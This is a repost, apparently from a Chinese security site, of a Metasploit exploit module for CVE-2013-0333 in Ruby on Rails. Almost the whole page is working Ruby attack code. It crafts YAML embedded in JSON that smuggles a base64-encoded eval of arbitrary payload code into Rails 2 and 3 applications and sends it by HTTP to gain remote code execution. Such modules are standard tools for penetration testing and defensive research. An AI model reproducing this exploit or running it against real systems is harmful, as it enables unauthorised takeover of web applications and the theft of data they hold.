首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ruby on Rails JSON Processor YAML Deserialization Code Execution
来源:metasploit.com 作者:egypt 发布时间:2013-01-30  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::CmdStagerTFTP
 include Msf::Exploit::Remote::HttpClient

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
   'Description'    => %q{
     This module exploits a remote code execution vulnerability in the
    JSON request processor of the Ruby on Rails application framework.
    This vulnerability allows an attacker to instantiate a remote object,
    which in turn can be used to execute any ruby code remotely in the
    context of the application. This vulnerability is very similar to
    CVE-2013-0156.

    This module has been tested successfully on RoR 3.0.9, 3.0.19, and
    2.3.15.

    The technique used by this module requires the target to be running a
    fairly recent version of Ruby 1.9 (since 2011 or so). Applications
    using Ruby 1.8 may still be exploitable using the init_with() method,
    but this has not been demonstrated.

   },
   'Author'         =>
    [
     'jjarmoc',  # Initial module based on cve-2013-0156, testing help
     'egypt',    # Module
     'lian',     # Identified the RouteSet::NamedRouteCollection vector
    ],
   'License'        => MSF_LICENSE,
   'References'  =>
    [
     ['CVE', '2013-0333'],
    ],
   'Platform'       => 'ruby',
   'Arch'           => ARCH_RUBY,
   'Privileged'     => false,
   'Targets'        => [ ['Automatic', {} ] ],
   'DisclosureDate' => 'Jan 28 2013',
   'DefaultOptions' => { "PrependFork" => true },
   'DefaultTarget' => 0))

  register_options(
   [
    Opt::RPORT(80),
    OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
    OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])

   ], self.class)

 end

 #
 # Create the YAML document that will be embedded into the JSON
 #
 def build_yaml_rails2

  code = Rex::Text.encode_base64(payload.encoded)
  yaml =
   "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
   "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
   "eval(%[#{code}].unpack(%[m0])[0]);' " +
   ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n   " +
   ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n     :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
   ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
  yaml.gsub(':', '\u003a')
 end


 #
 # Create the YAML document that will be embedded into the JSON
 #
 def build_yaml_rails3

  code = Rex::Text.encode_base64(payload.encoded)
  yaml =
   "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
   "'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
   ": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
  yaml.gsub(':', '\u003a')
 end

 def build_request(v)
  case v
  when 2; build_yaml_rails2
  when 3; build_yaml_rails3
  end
 end

 #
 # Send the actual request
 #
 def exploit

  [2, 3].each do |ver|
   print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
   send_request_cgi({
    'uri'     => normalize_uri(target_uri.path),
    'method'  => datastore['HTTP_METHOD'],
    'ctype'   => 'application/json',
    'headers' => { 'X-HTTP-Method-Override' => 'get' },
    'data'    => build_request(ver)
   }, 25)
   handler
  end

 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple Quick Time Player (Windo
·CoolPlayerPlusPortable 2.19.4
·Photodex ProShow Producers 5.0
·Wordpress theme sandbox Arbitr
·D-Link DCS Cameras Authenticat
·SQLiteManager 1.2.4 Remote PHP
·Inter-Keystroke Timing Proof O
·Windows Manage Memory Payload
·Oracle Automated Service Manag
·KMPlayer 3.5.0.77 Denial Of Se
·DataLife Engine preview.php PH
·Barracuda Networks SSHd Backdo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved